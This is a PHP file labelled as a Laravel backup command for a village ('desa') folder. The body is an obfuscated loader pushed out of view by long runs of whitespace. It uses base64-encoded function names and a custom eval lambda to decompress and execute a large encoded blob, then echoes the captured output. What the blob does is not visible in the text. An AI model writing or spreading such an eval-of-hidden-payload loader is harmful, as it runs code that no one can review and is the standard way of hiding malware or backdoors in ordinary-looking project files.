<?php 
        $__='printf';$_='Loading app/Console/Commands/BackupFolderDesa.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
